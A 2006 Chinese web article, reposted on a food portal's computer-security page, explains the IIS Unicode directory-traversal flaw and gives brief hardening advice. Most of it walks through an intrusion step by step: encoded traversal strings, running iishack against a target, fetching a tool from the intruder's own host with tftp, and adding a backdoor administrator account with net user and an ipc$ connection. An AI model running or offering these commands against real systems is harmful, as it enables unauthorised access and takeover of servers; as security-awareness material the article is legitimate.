| 网站首页 | 电子厨务 | 饮食信息 | 电子图库 | 厨客留言 | 520吃论坛 | 
加入收藏
设为首页
联系站长
您现在的位置: 520吃 >> 电子厨务 >> 电脑基础 >> 电脑安全 >> 文章正文
不要小看IIS的恶性杀手Unicode
          ★★★
【字体:
不要小看IIS的恶性杀手Unicode
作者:佚名    文章来源:本站原创    点击数:    更新时间:2006-9-9    

iis是“internet information server”的缩写,微软公司的web服务器,是windows 2000以上级别操作系统自带的一个组件,通过它来实现web服务器的功能。

  unicode漏洞是一个专门攻击iis的漏洞,unicode漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力改掉默认主页,重则删除硬盘上的数据,高手甚至可以轻松获取administrator权限!

  由于windows nt/2000操作系统的普及率比较高,所以很容易使它成为很多黑客攻击的目标。目前,windows nt/2000最主要的unicode漏洞一共有四种,分别针对不同语言的操作系统。分别为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这个字,按照正常的情况,根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对简体中文版iis中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在iis检测处理路径串中的“\”之后,所以可以突破iis路径访问到上级目录。

  被攻击迹象

  黑客一般都采用iis hack攻击法进行攻击,但是需要工具“iishack”(注:iishack.exe是攻击nt 4.0的,iishack1.exe是攻击nt 5.0的) netcat和tftp还有netdde。

  一般入侵者的攻击手法是这样的:

  首先,将tftp装到机器里面,将自己的机器变成一个ftp服务器。然后,搜索到nt机器的ip地址来进行攻击,例如:192.168.0.10。

  “c:\iishack 192.168.0.10 80 99 ”

  如果显示攻击成功的话,黑客就可以再输入:

  “c:\telnet 192.168.0.10 99 ”

  可以进入到“c:\winnt\system32\”里面,然后入侵者会运行“c:\winnt\system32\tftp -i <自己的ip地址> get netdde.exe ”然后再运行netdde.exe文件,建立一个账号,将它的权限提升到administrators组:

  “c:\winnt\system32\netdde.exe net user make love /add ”

  “c:\winnt\system32\netdde.exe net localgroup administrators make /add”

  然后退出来,用“net use \\192.168.0.10\ipc$ love /user:make”建立ipc连接以进行非法入侵。

  被攻击的机器,入侵者可以利用漏洞修改主页;删除硬盘上的东西;建立代理服务器,危害非常大。

  解决方法

   限制网络用户访问和调用“cmd”命令的权限;若没必要使用“scripts”和“msadc”目录,删除或改名;安装windows nt系统时不要使用默认“winnt”路径,改为其他的文件夹,如“c:\mywindowsnt”。

 

 
最新热点
最新推荐
相关文章
推荐:企业维护服务器安全的基
推荐:入侵检测系统与入侵防御
对付DSoS攻击 资深网管教你几
破解密码文件矛与盾 加密解密
五大手段确保网络的安全
典型入侵日志分析
网络安全DIY 不雇网管也能维
推荐:三种禁用FileSystemObj
Win2003下提高FSO的安全性
网站挂马奈我何
文章录入:admin    责任编辑:admin 
  • 上一篇文章:

  • 下一篇文章:
  • 发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    服务热线:(0)15972979128 客服QQ:21488139 Email:summy@520chi.com
    设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告
    Copyright (C) 2006 520chi.com, All Rights Reserved 版权所有 520吃网络 我要啦免费统计
    鄂ICP证B2-20060003号 如有意见请与我们联系 Powered by 520吃网络平台
    免责申明:520吃网络(http://520chi.com)上的所有提供下载的软件和资源均来源于网络,为软件或程序作者提供和网友推荐收集整理而来,仅供学习和研究使用。如有侵犯你的版权,请立即联系我们,本站将在3个工作日内删除。